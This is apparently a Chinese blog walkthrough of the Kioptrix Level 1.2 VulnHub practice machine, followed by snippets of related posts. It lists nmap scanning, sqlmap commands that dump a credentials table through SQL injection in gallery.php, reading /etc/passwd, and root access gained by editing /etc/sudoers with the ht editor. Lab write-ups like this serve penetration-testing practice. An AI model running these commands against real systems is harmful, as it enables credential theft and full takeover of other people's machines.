Kioptrix : Level 1.2靶机

最新推荐文章于 2024-09-07 20:53:35 发布
最新推荐文章于 2024-09-07 20:53:35 发布
阅读量316 收藏 5
点赞数 4
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/140806587
版权

扫描IP

nmap 192.168.111.131

使用 nmap 扫描结果,可以看到 HTTP 服务在 2 个端口上运行,即端口 22,80

访问192.168.111.131

将域名与ip做绑定

对于 Windows C:\windows\system32\drivers\etc\hosts

对于 Linux:/etc/hosts

浏览网站 http://kioptrix3.com/gallery 并浏览一些项目

发现有id参数

在php?id=1之后加上',即(通过尝试使用 http://kioptrix3.com/gallery/gallery.php?id=1')会出现SQL错误提示。因此,这意味着 URL 容易受到 SQL 注入的影响。

使用 SQLMAP 命令枚举数据库以获取更多详细信息

查询数据库名

sqlmap -u "http://192.168.111.131/gallery/gallery.php?id=1" --dbs –batch

查询数据库下的表

sqlmap -u "http://192.168.111.131/gallery/gallery.php?id=1" --batch -D gallery --tables

查看表下字段user和accounts

sqlmap -u "http://192.168.111.131/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump

尝试ssh连接

提权

查看内核版本信息

uname -a

查看靶机发行版本信息

cat /etc/*-release

查看/etc/passwd,有利用漏洞

cat /etc/passwd

查看目录

ls

查看readme文件

 cat CompanyPolicy.README

直接执行 sudo -l不行,看看可以执行什么

报错了

再次执行sudo ht,启动成功
F3查找 /etc/sudoers  然后在loneferrt后加,/bin/bash
F2保存
F10退出

执行sudo /bin/bash提权成功

陽陽yy
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 297
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 442
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1070
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
Kioptrix Level-1.2靶机
2401_84564260的博客
07-30 476
下面是 /etc/sudoers 文件的一个片段。编辑文件,以便我们可以无限制地使用 sudo。需要先在C:\windows\system32\drivers\etc\hosts映射ip。更改为 loneferret ALL=(ALL) NOPASSWD: ALL。发现url中可能存在sql注入 使用sqlmap进行测试。查看 CompanyPolicy.README文件。输入 ls 得到congrats.txt文件。使用 ls 查看更多信息 发现两个文件。检查一下sudo文件的内容。
vulnhub-KIOPTRIX: LEVEL 1.2 (#3)-KioptrixVM3靶场
shulao2010的博客
05-23 377
一个单机靶场,讲解了如何通过简单web漏洞获得主机root权限
KIOPTRIX: LEVEL 1.2 (#3)
Katarina__的博客
09-04 641
KIOPTRIX: LEVEL 1.2 (#3) 攻击机IP:192.168.253.143 靶机IP:192.168.253.144 一、信息收集 1、确定目标主机IP、开放端口 使用netdiscover确定网段内目标主机。 netdiscover -i eth0 -r 192.168.253.0/24 (主动探测网段内活动主机) 也可使用nmap扫固定网段 nmap -sP 192.168.253.0/24 找到ip后,可继续使用nmap探测此主机的开放端口等信息 nmap -n -
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2
LYJ20010728的博客
08-09 1195
VulnHub渗透测试实战靶场 - KIOPTRIX: LEVEL 1.2环境下载KIOPTRIX: LEVEL 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 KIOPTRIX: LEVEL 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.135 用Nmap探测一下目标靶机IP的端口
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1252
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1291
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
维度不固定的多维数组形参笔记
H2z1220的博客
09-05 182
假如我有多个元素个数都不一致的多维数组都需要调用这个函数进行处理,这个形参问题就凸显出来了,总不能创建N个不同的函数来进行处理吧?这样也太繁琐了,而且也适用度不高。这个函数可以传入多维数组,但元素个数必须是固定的,假如传入一个str[][20],元素个数不一样的数组,那么这个函数就不适用了,且会报错。所有数据在存储空间里面都是有地址的,那么就可利用指针寻址来获取到相应的数据。在查找了一些资料后受到了一点启发。而这里也可利用指针来指向多维数组。
【机器人工具箱Robotics Toolbox开发笔记(十)】机器人微分运动学
最新发布
m0_72676510的博客
09-07 87
机器人工具箱中,可用函数SerialLink.jacob0()求出对应某个位姿下绝对坐标系中的雅可比矩阵,用SerialLink.jacobn()求出对应某个位姿下工具坐标系中的雅可比矩阵。
C++学习笔记(10)
qq_60098634的博客
09-07 406
unordered_multimap 和 unordered_map 的区别在:unordered_multimap 允许关键字重复,而。unordered_multiset 和 unordered_set 的区别在:unordered_multiset 允许关键字重复,而。
【扇贝编程】使用Selenium模拟浏览器获取动态内容笔记
m0_73676887的博客
09-03 1646
文章目录selenium安装 selenium下载浏览器驱动获取数据处理数据查找一个元素查找所有符合条件的元素控制浏览器 selenium selenium是爬虫的好帮手, 可以控制你的浏览器,模仿人浏览网页,从而获取数据,自动操作等。 我们只要让 selenium 自动控制浏览器,实现爬取数据、自动抢票…… selenium要打开浏览器并控制它,占用的资源会更多,爬取数据的效率也会有所降低。 安装 selenium pip install selenium 下载浏览器驱动 根据你使用的浏览器(如 Chr
NLP面试题(9月4日笔记
ldk的博客
09-04 803
GRU中的另一个门被称为重置门,控制要遗忘多少过去的信息;GRU可看作是LSTM的一个变体,与LSTM相比,GRU只有两个门,将LSTM中的输入门和遗忘门合二为一,称为更新门,控制前边记忆信息能够继续保留到当前时刻的数据量,或者说决定有多少前一个时间步的信息和当前时间步的信息要被继续传递到未来;自然语言处理领域内所需要处理的信息通常是文本、语音等序列化的数据,对应数据通常会有较强的上下文依赖关系,因此在对对应的数据进行处理时,不仅需要了解当前数据的相关信息,同时还需要能够对上下文之间的数据能够有所了解。
fluent 旋转机械流场与声场仿真-学习笔记
Big_SHOe的博客
09-05 432
动网格算稳态和瞬态(平移,旋转,变形,偏转,例如阀门运动),滑移网格算瞬态(旋转)无须共享节点,运动参考系(SRF(Single-Reference Frame),MRF(Mult-Reference Frame), MPM(Mix-Plane model))算稳态。当期望获得转子-定子作用时间精确解(而不是时间平均解)时,必须采用滑移网格进行瞬态流场计算。滑移网格是最精确的用于求解多运动参考系问题的模型,然而对计算也是最苛刻的。很多时候,在滑移网格模拟中寻求的瞬态解是时间周期的。
尚硅谷前端 ES6 笔记
胡西风的博客
09-04 1680
ECMA(European Computer Manufacturers Association)是欧洲计算机制造商协会,目标是评估、开发和认可电信和计算机标准。1994年后改名为Ecma国际。ECMA-262 是Ecma国际制定的一个标准,专门描述了ECMAScript语言的行为。
【数学分析笔记】第3章第1节 函数极限(2)
随手写写
09-03 425
3. 函数极限与连续函数 3.1 函数极限 lim⁡x→x0f(x)=A:\lim\limits_{x\to x_{0}}f(x)=A:x→x0​lim​f(x)=A:对任意给定的ε>0\varepsilon>0ε>0,可以找到δ>0\delta>0δ>0,当xxx满足0<∣x−x0∣<δ0<|x-x_{0}|<\delta0<∣x−x0​∣<δ成立∣f(x)−A∣<ε|f(x)-A|<\varepsilon∣f(x)−A∣
Kioptrix Level 1.2 (#3)靶机攻破:信息收集与权限提升
"Kioptrix: Level 1.2 (#3) 是一款Vulnhub靶机,用于网络安全和渗透测试练习。靶机IP为192.168.190.189,需配置host指向kioptrix3.com。攻破靶机涉及信息收集、漏洞利用、GETShell以及提权等技能,主要工具包括dirb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值